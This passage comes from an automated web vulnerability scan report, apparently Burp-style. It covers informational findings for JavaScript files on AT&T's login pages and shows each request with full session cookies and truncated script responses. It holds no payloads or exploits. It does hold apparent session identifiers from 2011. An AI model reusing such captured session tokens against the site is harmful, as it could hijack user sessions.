Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 564
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:16 GMT
Connection: keep-alive

var css_browser_selector = function() {
var ua=navigator.userAgent.toLowerCase(),
is=function(t){return ua.indexOf(t) != -1;},
h=document.getElementsByTagName('html')[0],
b=(!(/opera|webtv/i.test(ua))
...[SNIP]...

10.7. https://www.att.com/olam/js/flash.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/flash.js

Request

GET /olam/js/flash.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 9542
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:36 GMT
Connection: keep-alive

function FlashLibrary(){
   var defaultVersion = 8; //SET THIS TO CURRENT VERSION USED BY AT&T
   
   var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
   var isWin = (navigator.appVers
...[SNIP]...

10.8. https://www.att.com/olam/js/gvpUtils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/gvpUtils.js

Request

GET /olam/js/gvpUtils.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 35224
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:18 GMT
Connection: keep-alive

function gvpUtils() {
   var W3C = (!document.all && document.getElementById);
   var IE = (document.all);
   var ns4 = (document.layers);
   var v_debug = false;
   var vMainInit = '';
   var vBrowBackButStatus
...[SNIP]...

10.9. https://www.att.com/olam/js/hideSelect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/hideSelect.js

Request

GET /olam/js/hideSelect.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1014
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:16 GMT
Connection: keep-alive

var isIE6 = navigator.userAgent.toLowerCase().indexOf('msie 6') != -1;
function hideSelects(){
   if(isIE6){
       var aSelects = document.getElementsByTagName( "select" );
       var nSelects = aSelects.length;
...[SNIP]...

10.10. https://www.att.com/olam/js/posUtil.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/posUtil.js

Request

GET /olam/js/posUtil.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 175
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:10:40 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:37 GMT
Connection: keep-alive

/**
* validating session time;
*/
function validateSessionTime() {
           // 600000
   setTimeout('sessionTimeoutRelogin()', 600000);
   document.onmousemove = getMousePos;    
}

10.11. https://www.att.com/olam/js/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/prototype.js

Request

GET /olam/js/prototype.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 126127
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:10:40 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:18 GMT
Connection: keep-alive

/* Prototype JavaScript framework, version 1.6.0.2
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototyp
...[SNIP]...

10.12. https://www.att.com/olam/js/registration.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/registration.js

Request

GET /olam/js/registration.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22current%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%2C%22role%22%3A%22null%22%2C%22time%22%3A%22Wed%20Apr%2027%2018%3A23%3A20%20CDT%202011%22%2C%22ctn%22%3A%22%22%2C%22user_type%22%3A%22TELCO%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; fsr.a=1303946628870

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 8103
Accept-Ranges: bytes
Last-Modified: Tue, 15 Mar 2011 22:10:40 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:42 GMT
Connection: keep-alive

function trim(str){return str.replace(/^\s*|\s*$/g,"");}
function isValidCTN(str){
   var re = /(^\d{10}$)/
   if (re.test(str)){
       return true;
   }
}
function isValidMID(str){
   /*var re = /^\w+([\+\.-]?\
...[SNIP]...

10.13. https://www.att.com/olam/js/sessionTimeout.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/sessionTimeout.js

Request

GET /olam/js/sessionTimeout.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; TLTHID=512C2E9A712510718C6AEED8C4C046B3; EDOCSSESSIONID=r1szN4lfnydZWhMhvtpJVyfNPtvCBTvgwJDhpT052DpQKDVvKqRC!725500378; stack=doammw31; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1789
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:16 GMT
Connection: keep-alive

function sessionTimeoutAlert(sessionLength)
{
var mil = (sessionLength - 2)*60*1000;
window.setTimeout('alertSessionExpiring()', mil-1000);
}

function alertSessionExpiring()
{
i
...[SNIP]...

10.14. https://www.att.com/olam/js/sniffer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/sniffer.js

Request

GET /olam/js/sniffer.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/loginAction.olamexecute?customerType=L
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; fsr.s=%7B%22cp%22%3A%7B%22customer_type%22%3A%22new%22%2C%22app_visitor_cookie%22%3A%22A001533839947%22%2C%22poc_login%22%3A%22no%22%2C%22mc%22%3A%22ICcs4CSUB0000000L%22%2C%22sd%22%3A%22c-wireless-sales%22%2C%22config_version%22%3A%22009A%22%2C%22code_version%22%3A%226.3.0%22%7D%2C%22rid%22%3A%221303946450313_179502%22%2C%22v%22%3A2%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fwelcome%2Findex.jsp%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d8%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%2C%22e%22%3A1%7D%7D%2C%22cd%22%3A8%2C%22sd%22%3A8%7D; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 4965
Accept-Ranges: bytes
Last-Modified: Wed, 16 Mar 2011 04:31:30 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Wed, 27 Apr 2011 23:23:34 GMT
Connection: keep-alive

// sniffer.js Ultimate client-side JavaScript client detection.
// (C) Netscape Communications 1999. Permission granted to reuse and distribute.
// Revised 08 March 2000 to focus on just Win/Mac & IE
...[SNIP]...

10.15. https://www.att.com/olam/js/tool-tips.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.att.com
Path:   /olam/js/tool-tips.js

Request

GET /olam/js/tool-tips.js HTTP/1.1
Host: www.att.com
Connection: keep-alive
Referer: https://www.att.com/olam/registrationAction.olamexecute
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=CFC3987A712410711B27EDDFEFA2AC4B; TLTUID=CFC3987A712410711B27EDDFEFA2AC4B; B2CSESSIONID=QpmbN4kFk2JVFn!966987163; DYN_USER_ID=3831805542; DYN_USER_CONFIRM=1235118b78dcad6811997a70c965cc03; cust_type=new; svariants=NA; BIGipServerpATTWL_7010_7011=3756118407.25115.0000; ECOM_GTM=owaln_osaln; DL3K=32nnnTa266WTriDckoD4M0ANMDOHT6md0slP1JdMoR5q-14ohahhI_A; bn_u=6923522882713032529; wtAka=y; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; op704wirelesssearchlandingpage1liid=a005005004274ri19c6a28261; BCNSESS=run=false; JSID_coredisp=0000ZcQz-B6qJ54k94jufOkeS6v:14cs3nf6m; DTAB=Tab=Bus; busHomeBox1=0; busHomeBox2=0; busHomeBox3=0; busHomeBox4=0; colam_ctn=l%3Den_US; TLTHID=53E74CF07125107191619E552188C3F4; EDOCSSESSIONID=LcHnN4lDXdLZ1N0cZc1BhKTv3CvHv8ywTx1r524x2P2CgpccQ7Ly!-744530585; browserid=A001533839947; stack=doammw08; 